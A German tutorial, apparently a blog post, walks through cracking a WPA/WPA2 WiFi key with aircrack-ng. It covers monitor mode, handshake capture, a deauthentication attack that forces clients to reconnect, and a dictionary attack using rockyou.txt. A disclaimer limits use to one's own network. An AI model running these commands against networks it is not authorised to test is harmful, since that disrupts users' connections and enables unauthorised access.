Wurde der Zettel mit dem WLAN-Schlüssel verlegt? Das Passwort für den Router auch nicht zur Hand? Alles kein Problem, denn dafür gibt es das Tool aircrack. Es ermöglicht das Knacken von WEP und WPA bzw. WPA2, sofern der Schlüssel bei WPA und WPA nicht zu komplex ist. Sollte dies der Fall sein könnte es Tage, Wochen oder sogar Jahre dauern bis der richtige Schlüssel gefunden ist.

Dieses Tool sollte ausschließlich für private Netzwerke genutzt werden, da alle anderen Tätigkeiten illegal sind.

Das Tool aircrack ist standartmäßig in der Linux-Distribution Kali Linux integriert, hat man grade keine Live-CD zur Hand muss man das Tool auf der Seite von aircrack herunterladen. Hat man diesen Punkt geschafft startet man im Fall von Linux die Shell.

Als erstes muss nun die WLAN-Karte (z.B. wlan0) in den sogenannten Monitor-Mode versetzt werden. Dies gelingt durch Eingabe der nachfolgenden Zeile:

airmon-ng start wlan0

Dabei kann es passieren, dass noch andere Dienste auf den WLAN-Adapter zugreifen, dann bekommen wir eine Meldung wie auf dem nachfolgendem Bild.
Probleme bei Ausführen von airmon-ng
Damit es im weiteren Verlauf nicht zu Problemen kommt, sollten wir die dort aufgeführten Prozesse beenden.

kill < PID >

Im Anschluss starten wir das Tool airodump, um uns verfügbare WLAN-Netze und damit verbundene Endgeräte in der Umgebung anzuzeigen.

airodump-ng mon0

airodump zeigt Netzwerke
Wenn wir unser WLAN entdeckt haben, stellen wir airodump so ein, dass es nur noch auf unserem WLAN lauscht und aufgezeichnete Handshakes in eine Datei schreibt.

airodump-ng -c 11 --bssid 90:F6:52:F2:87:25 -w handshake mon0

Nun könnten wir warten bis sich ein Gerät in diesem Netzwerk neu anmeldet, dies könnte jedoch dauern. Daher nutzen wir das Tool aireplay in einem neuen Fenster, um eine sogenannte Deauth-Attacke durchzuführen. Diese Attacke zwingt Geräte im Netzwerk sich erneut mit dem Access Point zu verbinden.

aireplay-ng --deauth 10 -a 90:F6:52:F2:87:25 mon0

Deauth-Angriff mit aireplay-ng
Jetzt können wir wieder in das Fenster von airodump wechseln. In der oberen linken Ecke sollte nun WPA handshake mit der vorher Angegriffenen MAC-Adresse stehen. Somit wurde der Handshake in die vorhin angegebene Datei geschrieben und wir können mit aircrack das Passwort bruteforcen. Zur Demonstration habe ich ein Passwort aus dem Wörterbuch rockyou.txt, welches unter Kali Linux im Verzeichnis /usr/share/wordlists/ als Archiv vorliegt, gewählt.

aircrack-ng -a 2 -b 90:F6:52:F2:87:25 -w /usr/share/wordlists/rockyou.txt handshake-01.cap

Wenn aircrack erfolgreich ist, dann erscheint das geknackte Passwort, wie im Titelbild zusehen ist.

Zum Schluss eine kleine Befehlsübersicht mit Erklärung der Parameter.

airmon-ng start < Interface >
airodump-ng -c < Channel > --bssid < MAC-Adresse des Access Points > -w < Dateiname > < Interface >
aireplay-ng --deauth < Anzahl Deauth-Pakete > -a < MAC-Adresse des Access Points > < Interface >
aircrack-ng -a < Verschlüsselung > -b < MAC-Adresse des Access Points > -w < Wörterbuch > < CAP-Datei >

Links zum Beitrag